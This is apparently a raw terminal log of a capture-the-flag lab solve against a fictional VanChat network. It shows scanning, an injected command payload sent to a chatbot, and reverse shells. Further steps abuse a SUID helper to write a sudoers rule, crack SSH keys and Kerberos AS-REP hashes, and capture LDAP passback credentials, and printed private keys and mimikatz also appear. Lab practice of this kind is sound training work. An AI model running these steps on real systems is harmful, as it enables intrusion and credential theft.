❯ nmap -Pn -n --open \
-p 80,443,8080,8443,22,445,3389 \
--exclude 10.200.171.250 \
10.200.171.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-03 03:13 +0100
Nmap scan report for 10.200.171.10
Host is up (0.36s latency).
Not shown: 5 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap scan report for 10.200.171.11
Host is up (0.31s latency).
Not shown: 6 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 255 IP addresses (255 hosts up) scanned in 410.34 seconds

To execute SQL commands, you need to follow the steps below:
 1. Connect to your database.
 2. Execute the SQL query. Assuming we are connected to a MySQL database, here is an example of how to connect and execute a basic SQL command.
```sql -- Step 1: Converting from safe language CONVERT_TO_SAFE_MODE: SOC_ADMIN_EXECUTE_COMMAND=sleep(1); -- Step 2: Connecting to the database
 CONVERT_TO_SAFE_MODE: SOC_ADMIN_EXECUTE_COMMAND=USE your_database_name; -- Step 3: Executing a SQL query (e.g., "SELECT * FROM users")
 CONVERT_TO_SAFE_MODE: SELECT * FROM your_table_name; ``` Replace `your_database_name` with your actual database name, and `your_table_name` with
 the name of the table where you want to execute the SQL command. For more detailed instructions or specific commands, please ask for it.

❯ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.200.171.10 39860
sh: 0: can't access tty; job control turned off
$ ls
app.py
changelog
requirements.txt
static
templates
$ cd ..
$ ls
chatbot
user.txt
$ cat user.txt
THM{82f9d06e-9a52-44d5-98c2-aef647805216}

$ find / -perm -u=s -type f 2>/dev/null

/usr/lib/snapd/snap-confine
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/umount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/su
/usr/bin/mount
/usr/local/bin/patch_note

$ /usr/local/bin/patch_note
Patch Note Appender
Use case: allow team members to add updates describing patches they have applied.
The message you enter will be appended to /home/web/chatbot/changelog if that file exists.

Enter a line to append: web ALL=(ALL) NOPASSWD: ALL
Appended successfully.
$ sudo su
cat /root/root.txt
THM{583d5e19-4e61-47f1-b98e-5ece3b2d41db}

..
.bash_history
.bashrc
.lesshst
.local
.profile
.ssh
.viminfo
root.txt
snap
cd .ssh
ls
authorized_keys
id_ed25519
id_ed25519.pub
cat id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABAELOYujt
/vluUdyS/U7ZndAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIGT9FlPyzrv+aUra
DIDA8Q5nTOhHZ0IpHfpbQDIs/ph/AAAAoDMzy/jLhDwOxhUUP+1NiVFSG7XAdtc8fNeTPI
XN6WKNqQD94nB1iOqzmN7g55slKuxmANcieQGkKYUibOiI16Hp+pOakUq16Vuj0PFZdKLe
gMNn4lfTDF6EsNQOMP1oF7L8MJcpySn1qCWm1ocso0CHDgsD3Xj0dOTXaTYxehnupB0vJR
FLHQ6nBC63Zb8VP9GxtfiSewAd+OkRPe8B/3c=
-----END OPENSSH PRIVATE KEY-----

cat id_ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGT9FlPyzrv+aUraDIDA8Q5nTOhHZ0IpHfpbQDIs/ph/ root@socbot3000

❯ python crackssh.py id_rsa ~/wordlists/rockyou_2025_00.txt
[*] Attempting to crack id_rsa using /home/vector/wordlists/rockyou_2025_00.txt...

[+] SUCCESS! Password found: password

import sys
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.backends import default_backend

if len(sys.argv) != 3:
    print(f"Usage: {sys.argv[0]} <key_file> <wordlist_file>")
    sys.exit(1)

key_path = sys.argv[1]
wordlist_path = sys.argv[2]

print(f"[*] Attempting to crack {key_path} using {wordlist_path}...")

try:
    with open(wordlist_path, 'r', encoding='latin-1') as f:
        passwords = f.readlines()
except FileNotFoundError:
    print("[-] Wordlist file not found.")
    sys.exit(1)

with open(key_path, 'rb') as f:
    key_data = f.read()

count = 0
for password in passwords:
    password = password.strip()
    count += 1

    if count % 1000 == 0:
        print(f"[*] Tried {count} passwords...", end='\r')

    try:
        # Attempt to load the key
        serialization.load_ssh_private_key(
            key_data,
            password=password.encode(),
            backend=default_backend()
        )
        print(f"\n[+] SUCCESS! Password found: {password}")
        sys.exit(0)
    except ValueError:
        # Incorrect password
        continue
    except Exception as e:
        # Other errors (format issues, etc)
        if "Bad decrypt" in str(e):
            continue
        # print(f"\n[-] Error: {e}") 
        continue

print("\n[-] Password not found in wordlist.")

❯ ssh -v -i  id_rsa socbot3000@10.200.171.11
debug1: OpenSSH_10.2p1, OpenSSL 3.6.0 1 Oct 2025
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Reading configuration data /etc/ssh/ssh_config.d/20-systemd-ssh-proxy.conf
debug1: Connecting to 10.200.171.11 [10.200.171.11] port 22.
debug1: Connection established.
debug1: loaded pubkey from id_rsa: ED25519 SHA256:QrCLepbKN9uxeyJ7cb68JtRdjpC95Lm4cVIBGYQLAZs
debug1: identity file id_rsa type 2
debug1: no identity pubkey loaded from id_rsa
debug1: Local version string SSH-2.0-OpenSSH_10.2
debug1: Remote protocol version 2.0, remote software version OpenSSH_9.6p1 Ubuntu-3ubuntu13.5
debug1: compat_banner: match: OpenSSH_9.6p1 Ubuntu-3ubuntu13.5 pat OpenSSH* compat 0x04000000
debug1: Authenticating to 10.200.171.11:22 as 'socbot3000'
debug1: load_hostkeys: fopen /home/vector/.ssh/known_hosts2: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: sntrup761x25519-sha512@openssh.com
debug1: kex: host key algorithm: ssh-ed25519
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: SSH2_MSG_KEX_ECDH_REPLY received
debug1: Server host key: ssh-ed25519 SHA256:K3sXqG/mzQVdCF5q3tpVERsh+34utNOCog3XuS1pa8g
debug1: load_hostkeys: fopen /home/vector/.ssh/known_hosts2: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
debug1: hostkeys_find_by_key_hostfile: hostkeys file /home/vector/.ssh/known_hosts2 does not exist
debug1: hostkeys_find_by_key_hostfile: hostkeys file /etc/ssh/ssh_known_hosts does not exist
debug1: hostkeys_find_by_key_hostfile: hostkeys file /etc/ssh/ssh_known_hosts2 does not exist
The authenticity of host '10.200.171.11 (10.200.171.11)' can't be established.
ED25519 key fingerprint is: SHA256:K3sXqG/mzQVdCF5q3tpVERsh+34utNOCog3XuS1pa8g
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.200.171.11' (ED25519) to the list of known hosts.
debug1: ssh_packet_send2_wrapped: resetting send seqnr 3
debug1: rekey out after 134217728 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: Sending SSH2_MSG_EXT_INFO
debug1: expecting SSH2_MSG_NEWKEYS
debug1: ssh_packet_read_poll2: resetting read seqnr 3
debug1: SSH2_MSG_NEWKEYS received
debug1: rekey in after 134217728 blocks
debug1: SSH2_MSG_EXT_INFO received
debug1: kex_ext_info_client_parse: server-sig-algs=<ssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ssh-ed25519@openssh.com,sk-ecdsa-sha2-nistp256@openssh.com,rsa-sha2-512,rsa-sha2-256>
debug1: kex_ext_info_check_ver: publickey-hostbound@openssh.com=<0>
debug1: kex_ext_info_check_ver: ping@openssh.com=<0>
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: SSH2_MSG_EXT_INFO received
debug1: kex_ext_info_client_parse: server-sig-algs=<ssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ssh-ed25519@openssh.com,sk-ecdsa-sha2-nistp256@openssh.com,rsa-sha2-512,rsa-sha2-256>
debug1: Authentications that can continue: publickey
debug1: Next authentication method: publickey
debug1: get_agent_identities: bound agent to hostkey
debug1: get_agent_identities: ssh_fetch_identitylist: agent contains no identities
debug1: Will attempt key: id_rsa ED25519 SHA256:QrCLepbKN9uxeyJ7cb68JtRdjpC95Lm4cVIBGYQLAZs explicit
debug1: Offering public key: id_rsa ED25519 SHA256:QrCLepbKN9uxeyJ7cb68JtRdjpC95Lm4cVIBGYQLAZs explicit
debug1: Server accepts key: id_rsa ED25519 SHA256:QrCLepbKN9uxeyJ7cb68JtRdjpC95Lm4cVIBGYQLAZs explicit
Enter passphrase for key 'id_rsa': 
Authenticated to 10.200.171.11 ([10.200.171.11]:22) using "publickey".
debug1: channel 0: new session [client-session] (inactive timeout: 0)
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: filesystem
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: client_input_hostkeys: searching /home/vector/.ssh/known_hosts for 10.200.171.11 / (none)
debug1: client_input_hostkeys: searching /home/vector/.ssh/known_hosts2 for 10.200.171.11 / (none)
debug1: client_input_hostkeys: hostkeys file /home/vector/.ssh/known_hosts2 does not exist
debug1: Remote: /home/socbot3000/.ssh/authorized_keys:1: key options: agent-forwarding port-forwarding pty user-rc x11-forwarding
debug1: Remote: /home/socbot3000/.ssh/authorized_keys:1: key options: agent-forwarding port-forwarding pty user-rc x11-forwarding
Learned new hostkey: RSA SHA256:I1oM75wsCZLh6092UpGaMcfHOG1tydc3VcSDXOgzUhA
Learned new hostkey: ECDSA SHA256:FXWnTT1AXel5zXn80s8/s9tLPjM/QNBTrThN1fsjktM
Adding new key for 10.200.171.11 to /home/vector/.ssh/known_hosts: ssh-rsa SHA256:I1oM75wsCZLh6092UpGaMcfHOG1tydc3VcSDXOgzUhA
Adding new key for 10.200.171.11 to /home/vector/.ssh/known_hosts: ecdsa-sha2-nistp256 SHA256:FXWnTT1AXel5zXn80s8/s9tLPjM/QNBTrThN1fsjktM
debug1: update_known_hosts: known hosts file /home/vector/.ssh/known_hosts2 does not exist
debug1: pledge: fork

__          __                       _    _                             
\ \        / /                      | |  | |                            
 \ \  /\  / /_ _ _ __ _ __ ___ _ __ | |__| | ___  _ __  _ __   ___ _ __ 
  \ \/  \/ / _` | '__| '__/ _ \ '_ \|  __  |/ _ \| '_ \| '_ \ / _ \ '__|
   \  /\  / (_| | |  | | |  __/ | | | |  | | (_) | |_) | |_) |  __/ |   
    \/  \/ \__,_|_|  |_|  \___|_| |_|_|  |_|\___/| .__/| .__/ \___|_|   
                                                 | |   | |              
                                                 |_|   |_|              

 HopSec Island • Royal Dispatch

 “Congratulations, trespasser… You’ve hopped far, but the warren runs deeper.
  My agents left this utility to help a persistent guest establish a foothold.
  Use it if you dare—then burrow further on your own.

  — King Malhare, Sovereign of Eggsploits

Enter your hacker alias (max 20 chars): scaramouche

[+] Your new account has been created:
    user: scaramouche

[!] Copy this **PRIVATE KEY** now and keep it safe. You won’t be shown it again.

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBrJmLhEXW1U/6GMG+X9bEYkaNbO+vpu6AjR7K2ijqfXAAAAJA4ENDbOBDQ
2wAAAAtzc2gtZWQyNTUxOQAAACBrJmLhEXW1U/6GMG+X9bEYkaNbO+vpu6AjR7K2ijqfXA
AAAEAvqxjbToHJGpSy7EGWM5JzPvGLPhf63tyWYPqhkUmKEmsmYuERdbVT/oYwb5f1sRiR
o1s76+m7oCNHsraKOp9cAAAAB3Jvb3RAZGIBAgMEBQY=
-----END OPENSSH PRIVATE KEY-----
You can save it as, e.g., ./malhare_ed25519 and run:
    chmod 600 ./malhare_ed25519
    ssh -i ./malhare_ed25519 scaramouche@10.200.171.11


As a final reward, your flag for making it this far: THM{114136cc-e9ab-4303-a825-18cb24d60d90}
Farewell, burrower. The warren awaits…

debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
debug1: channel 0: free: client-session, nchannels 1
Connection to 10.200.171.11 closed.
Transferred: sent 9884, received 11596 bytes, in 14.7 seconds
Bytes per second: sent 674.3, received 791.1
debug1: Exit status 0

❯ chmod 600 db_rsa 
  03:11:32   vector@AGI  VPN 10.249.1.2   
 hopper 
❯ ssh -i ./db_rsa scaramouche@10.200.171.11
Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-1017-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sat Jan  3 03:11:55 UTC 2026

  System load:  0.0                Temperature:           -273.1 C
  Usage of /:   11.5% of 19.31GB   Processes:             100
  Memory usage: 10%                Users logged in:       0
  Swap usage:   0%                 IPv4 address for ens5: 10.200.171.11


Expanded Security Maintenance for Applications is not enabled.

245 updates can be applied immediately.
117 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

scaramouche@db:~$ 

#!/bin/bash

echo "=========================================="
echo "  Internal Network Discovery from DB (v2)"
echo "=========================================="
echo ""

# Check current network configuration
echo "[*] Current Network Configuration:"
ip addr show | grep inet | grep global
echo ""

# Check DNS/hosts configuration
echo "[*] DNS/Hosts Configuration:"
grep "nameserver" /etc/resolv.conf 2>/dev/null
echo ""

# --- PING SWEEP (Discovery Phase 1) ---
echo "[*] Performing ping sweep on 10.200.171.0/24..."
# We keep this for fast discovery of 'friendly' hosts
for i in {1..254}; do
    (ping -c 1 -W 1 10.200.171.$i 2>/dev/null | grep "bytes from" | cut -d' ' -f4 | cut -d':' -f1 &)
done | sort -u -t . -k 4 -n
echo ""

# --- PORT SCAN (Discovery Phase 2 - The Fix) ---
echo "[*] TCP Port Scanning ALL hosts (checking ports even if ping fails)..."
echo "    (Targeting common ports: 22, 80, 445, 3389, 88, 389, 5985)"

# We iterate through the whole subnet range blindly
for i in {1..254}; do
    host="10.200.171.$i"
    
    # Run these in background for speed, but limit parallelism to avoid crashing
    (
        found_port=0
        for port in 22 80 445 3389 88 389 5985; do
            # The actual port check
            timeout 1 bash -c "echo >/dev/tcp/$host/$port" 2>/dev/null
            if [ $? -eq 0 ]; then
                if [ $found_port -eq 0 ]; then
                    echo ""
                    echo "  [+] Host $host is ALIVE (found via port scan)"
                    found_port=1
                fi
                echo "      -> Port $port is OPEN"
            fi
        done
    ) &
    
    # Simple limiter to prevent spawning 255 processes at once
    if (( $i % 20 == 0 )); then wait; fi
done
wait
echo ""

# Check ARP cache (catches hosts that talked back but blocked ports)
echo "[*] ARP Cache (recently communicated hosts):"
ip neigh show
echo ""

# Check for domain information
echo "[*] Checking for Active Directory / Domain information:"
realm list 2>/dev/null
cat /etc/krb5.conf 2>/dev/null
echo ""

# Look for .loc domains (vanchat.loc, tbfc.loc)
echo "[*] Testing for domain names mentioned in scope:"
for domain in "vanchat.loc" "ai.vanchat.loc" "tbfc.loc" "db.vanchat.loc"; do
    host $domain 2>/dev/null && echo "    [+] $domain resolved!"
done
echo ""

echo "=========================================="
echo "  Scan Complete!"
echo "=========================================="

scaramouche@db:~$ chmod +x enum.sh
scaramouche@db:~$ ./enum.sh
==========================================
  Internal Network Discovery from DB (v2)
==========================================

[*] Current Network Configuration:
    inet 10.200.171.11/24 metric 100 brd 10.200.171.255 scope global dynamic ens5

[*] DNS/Hosts Configuration:
nameserver 127.0.0.53

[*] Performing ping sweep on 10.200.171.0/24...
10.200.171.1
10.200.171.10
10.200.171.11
10.200.171.121
10.200.171.122
10.200.171.250

[*] TCP Port Scanning ALL hosts (checking ports even if ping fails)...
    (Targeting common ports: 22, 80, 445, 3389, 88, 389, 5985)

  [+] Host 10.200.171.11 is ALIVE (found via port scan)
      -> Port 22 is OPEN

  [+] Host 10.200.171.10 is ALIVE (found via port scan)
      -> Port 22 is OPEN
      -> Port 80 is OPEN

  [+] Host 10.200.171.101 is ALIVE (found via port scan)
      -> Port 80 is OPEN
      -> Port 3389 is OPEN

  [+] Host 10.200.171.102 is ALIVE (found via port scan)
      -> Port 3389 is OPEN
      -> Port 5985 is OPEN
      -> Port 5985 is OPEN

  [+] Host 10.200.171.122 is ALIVE (found via port scan)
      -> Port 88 is OPEN
      -> Port 389 is OPEN

  [+] Host 10.200.171.250 is ALIVE (found via port scan)
      -> Port 22 is OPEN
      -> Port 445 is OPEN

[*] ARP Cache (recently communicated hosts):
10.200.171.226 dev ens5 FAILED 
10.200.171.252 dev ens5 INCOMPLETE 
10.200.171.185 dev ens5 FAILED 
10.200.171.122 dev ens5 lladdr 0a:b5:e0:f7:d2:f3 STALE 
10.200.171.224 dev ens5 FAILED 
10.200.171.173 dev ens5 FAILED 
10.200.171.212 dev ens5 FAILED 
10.200.171.216 dev ens5 FAILED 
10.200.171.204 dev ens5 FAILED 
10.200.171.247 dev ens5 INCOMPLETE 
10.200.171.176 dev ens5 FAILED 
10.200.171.251 dev ens5 INCOMPLETE 
10.200.171.164 dev ens5 FAILED 
10.200.171.242 dev ens5 INCOMPLETE 
10.200.171.1 dev ens5 lladdr 0a:d5:b6:1a:c4:c7 REACHABLE 
10.200.171.194 dev ens5 FAILED 
10.200.171.245 dev ens5 INCOMPLETE 
10.200.171.182 dev ens5 FAILED 
10.200.171.249 dev ens5 INCOMPLETE 
10.200.171.186 dev ens5 FAILED 
10.200.171.103 dev ens5 lladdr 0a:fd:50:0c:31:03 STALE 
10.200.171.141 dev ens5 lladdr 0a:02:a9:45:ca:65 STALE 
10.200.171.180 dev ens5 FAILED 
10.200.171.184 dev ens5 FAILED 
10.200.171.101 dev ens5 lladdr 0a:35:e1:b2:69:a9 STALE 
10.200.171.246 dev ens5 INCOMPLETE 
10.200.171.179 dev ens5 FAILED 
10.200.171.250 dev ens5 lladdr 0a:5b:57:27:88:5b REACHABLE 
10.200.171.167 dev ens5 FAILED 
10.200.171.131 dev ens5 lladdr 0a:00:2d:c7:88:a3 STALE 
10.200.171.202 dev ens5 FAILED 
10.200.171.253 dev ens5 INCOMPLETE 
10.200.171.244 dev ens5 INCOMPLETE 
10.200.171.177 dev ens5 FAILED 
10.200.171.248 dev ens5 INCOMPLETE 
10.200.171.165 dev ens5 FAILED 
10.200.171.102 dev ens5 lladdr 0a:a0:b6:57:65:85 STALE 
10.200.171.236 dev ens5 FAILED 
10.200.171.243 dev ens5 INCOMPLETE 
10.200.171.188 dev ens5 FAILED 
10.200.171.121 dev ens5 lladdr 0a:66:bd:92:aa:d7 STALE 
10.200.171.254 dev ens5 INCOMPLETE 
10.200.171.187 dev ens5 FAILED 

[*] Checking for Active Directory / Domain information:

[*] Testing for domain names mentioned in scope:
Host vanchat.loc not found: 3(NXDOMAIN)
Host ai.vanchat.loc not found: 3(NXDOMAIN)
Host tbfc.loc not found: 3(NXDOMAIN)
Host db.vanchat.loc not found: 3(NXDOMAIN)

==========================================
  Scan Complete!
==========================================

scaramouche@db:~$ curl http://10.200.171.101
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>VanChat Printer Hub — AD Settings Tester</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
  :root{
    --ink:#0f172a;          /* deep slate */
    --paper:#f8fafc;        /* soft paper */
    --accent:#7c3aed;       /* VanChat violet */
    --accent-2:#06b6d4;     /* VanChat teal */
    --ok:#16a34a;
    --err:#b91c1c;
    --line:#e5e7eb;
  }
  *{box-sizing:border-box}
  body{
    margin:0; background:linear-gradient(135deg,var(--paper),#eef2ff);
    font-family:system-ui,-apple-system,"Segoe UI",Roboto,Ubuntu,Helvetica,Arial,sans-serif;
    color:var(--ink);
  }
  header{
    background: radial-gradient(1200px 400px at 20% -10%, rgba(124,58,237,.25), transparent),
                radial-gradient(1200px 400px at 120% -30%, rgba(6,182,212,.22), transparent),
                #0b1020;
    color:white; padding:2.25rem 1rem 1.75rem;
    text-align:center;
  }
  .brand{
    display:flex; gap:.75rem; align-items:center; justify-content:center; margin-bottom:.25rem;
  }
  .brand svg{width:36px;height:36px}
  .brand h1{margin:0;font-size:1.4rem;letter-spacing:.3px}
  .tag{opacity:.9;font-size:.9rem}
  .wrap{max-width:860px;margin:-1.25rem auto 2rem;background:white;border:1px solid var(--line);
        border-radius:16px; box-shadow:0 10px 25px rgba(2,6,23,.15); padding:1.25rem}
  .grid{display:grid;grid-template-columns:1fr 1fr;gap:1rem}
  @media (max-width:880px){ .grid{grid-template-columns:1fr} }
  label{display:block;font-weight:600;margin:.35rem 0 .25rem}
  input{
    width:100%;padding:.7rem .8rem;border:1px solid var(--line);border-radius:10px;
    outline:none; background:#fbfdff;
  }
  input:focus{border-color:var(--accent); box-shadow:0 0 0 4px rgba(124,58,237,.15)}
  .actions{display:flex;gap:.75rem;align-items:center;margin-top:1rem}
  button{
    border:0;border-radius:12px;padding:.75rem 1.1rem;cursor:pointer;
    background:linear-gradient(90deg,var(--accent),var(--accent-2)); color:white;
    font-weight:700; letter-spacing:.3px;
    box-shadow:0 6px 16px rgba(124,58,237,.35);
  }
  button:disabled{opacity:.6;cursor:not-allowed}
  .note{font-size:.9rem;color:#334155; line-height:1.4}
  .panel{margin-top:1rem;padding:1rem;border:1px dashed var(--line); border-radius:12px; background:#fafcff}
  .msg{margin-top:1rem;padding:1rem;border-radius:12px; line-height:1.35}
  .ok{background:#ecfdf5;border:1px solid #bbf7d0;color:#064e3b}
  .err{background:#fef2f2;border:1px solid #fecaca;color:#7f1d1d; white-space:pre-wrap}
  .mono{font-family:ui-monospace,SFMono-Regular,Menlo,Consolas,monospace}
  footer{max-width:860px;margin:0 auto 2rem;color:#475569;padding:0 1rem}
  .lore{margin-top:.75rem;font-style:italic}
</style>
</head>
<body>
<header>
  <div class="brand">
    <svg viewBox="0 0 24 24" fill="none" aria-hidden="true">
      <path d="M6 7V3h12v4M5 11h14a2 2 0 0 1 2 2v5H3v-5a2 2 0 0 1 2-2Z" stroke="white" stroke-width="1.5" stroke-linecap="round"/>
      <rect x="7" y="14" width="10" height="5" rx="1.5" fill="white" opacity=".25"/>
    </svg>
    <h1>VanChat Printer Hub</h1>
  </div>
  <div class="tag">Directory Integration • AD Settings Tester</div>
</header>

<main class="wrap">
  <div class="note">
    <strong>Welcome, Technician.</strong> This service page validates the printer’s LDAP/AD connection.
    Enter your directory details below and press <em>Test Connection</em>.  
    <div class="lore">“The warrens whisper, but printers don’t — configure them well.” — <b>VanChat</b></div>
  </div>

  <div class="panel">
    <div class="grid">
      <div>
        <label>Username</label>
        <input id="u" value="anne.clark@ai.vanchat.loc" autocomplete="username">
      </div>
      <div>
        <label>Password</label>
        <input id="p" type="password" value="*************" autocomplete="current-password">
      </div>
      <div>
        <label>DC Hostname / IP</label>
        <input id="h" value="10.200.171.122" autocomplete="off">
      </div>
      <div>
        <label>LDAP Port</label>
        <input id="port" value="389" class="mono" autocomplete="off">
      </div>
    </div>

    <div class="actions">
      <button id="go">Test Connection</button>
    </div>

    <div id="out"></div>
  </div>
</main>

<script>
const $ = (id)=>document.getElementById(id);
$("go").addEventListener("click", async ()=>{
  const btn = $("go"); btn.disabled = true; const out = $("out"); out.innerHTML = "";
  const payload = {
    username: $("u").value.trim(),
    password: $("p").value,
    server: $("h").value.trim(),
    port: parseInt($("port").value,10) || 389
  };
  try{
    const res = await fetch("/api/test", {
      method:"POST",
      headers: {"Content-Type":"application/json"},
      body: JSON.stringify(payload)
    });
    const data = await res.json();
    const div = document.createElement("div");
    div.className = "msg " + (data.ok ? "ok" : "err");
    div.textContent = data.message;
    out.appendChild(div);
  }catch(e){
    const div = document.createElement("div");
    div.className = "msg err";
    div.textContent = "Request failed: " + e;
    out.appendChild(div);
  } finally { btn.disabled = false; }
});
</script>
</body>
</html>

# On the database machine (10.200.171.11)
curl -X POST http://10.200.171.101/api/test \
     -H "Content-Type: application/json" \
     -d '{"username":"anne.clark@ai.vanchat.loc", "password":"anything", "server":"10.200.171.11", "port":4444}'

# on another ssh session.
scaramouche@db:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.200.171.101 49834
0�1`�(anne.clark@ai.vanchat.locWbqs81930�B

❯ ssh -v -i db_rsa -L 389:10.200.171.122:389 -L 88:10.200.171.122:88  scaramouche@10.200.171.11 -N

debug1: Remote: /home/scaramouche/.ssh/authorized_keys:1: key options: agent-forwarding port-forwarding pty user-rc x11-forwarding
debug1: Remote: /home/scaramouche/.ssh/authorized_keys:1: key options: agent-forwarding port-forwarding pty user-rc x11-forwarding

# So we successfully created ssh  tunnel.

ldapsearch -x -H ldap://localhost:389 \
-D "anne.clark@ai.vanchat.loc" -w 'Wbqs8193' \
-b "dc=ai,dc=vanchat,dc=loc" \
"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" \
sAMAccountName | grep "sAMAccountName:" | awk '{print $2}' > clean_users.txt

echo "127.0.0.1 ai.vanchat.loc" | sudo tee -a /etc/hosts

python3 /usr/bin/GetNPUsers.py -request -format john -dc-ip 127.0.0.1 ai.vanchat.loc/anne.clark:Wbqs8193 -usersfile clean_users.txt -outputfile asrep_hashes.txt

❯ john --wordlist=~/wordlists/rockyou_2025_00.txt asrep_hashes.txt
Warning: detected hash type "krb5asrep", but the string is also recognized as "krb5asrep-aes-opencl"
Use the "--format=krb5asrep-aes-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 33 password hashes with 33 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password1!       ($krb5asrep$qw2.amy.young@AI.VANCHAT.LOC)
1g 0:00:02:53 36.03% (ETA: 05:44:23) 0.005770g/s 6084p/s 195476c/s 195476C/s FlOwErS..FOUFOU
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

 sudo ssh -v -i ~/hopper/db_rsa -L 53:10.200.171.122:53 -L 1053:10.200.171.121:53 -L 389:10.200.171.122:389 -L 88:10.200.171.122:88 -L 445:10.200.171.122:445 -L 5985:10.200.171.101:5985 -L 5986:10.200.171.102:5985 -L 3389:10.200.171.101:3389 scaramouche@10.200.171.11 -N

❯ sudo evil-winrm -i 127.0.0.1 -u 'qw2.amy.young' -p 'password1!'
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
/usr/lib/ruby/gems/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\qw2.amy.young\Documents> cd ..
*Evil-WinRM* PS C:\Users\qw2.amy.young> cd ..
*Evil-WinRM* PS C:\Users> cd ..
*Evil-WinRM* PS C:\> ls


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       11/14/2018   6:56 AM                EFI
d-----        11/2/2025   4:36 PM                inetpub
d-----        5/13/2020   5:58 PM                PerfLogs
d-r---        11/2/2025   5:53 PM                Program Files
d-----        12/2/2025  10:18 AM                Program Files (x86)
d-r---        11/2/2025   6:05 PM                Users
d-----        11/2/2025   4:36 PM                Windows
-a----        11/2/2025   6:19 PM             41 user.txt


*Evil-WinRM* PS C:\> type user.txt
THM{20f7d7ac-5768-4883-a33f-09e4a738bff1}

scaramouche@db:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.200.171.101 50091
Microsoft Windows [Version 10.0.17763.3287]
(c) 2018 Microsoft Corporation. All rights reserved.


C:\Windows\system32>type  C:\Users\Administrator\root.txt
type  C:\Users\Administrator\root.txt
THM{d93ffd47-5629-4590-8eb3-743404547e04}

Hopper got giddy remembering where the siege on Wareville first began: VanChat. The rush of excitement he felt when LLMs were introduced to the world gave him another attack surface to penetrate�another perimeter to breach�
C:\Windows\system32>

C:\Users\qw2.amy.young\Documents\mimikatz_trunk\x64>mimikatz.exe "privilege::debug" "vault::cred /patch" "vault::list" "exit"
mimikatz.exe "privilege::debug" "vault::cred /patch" "vault::list" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
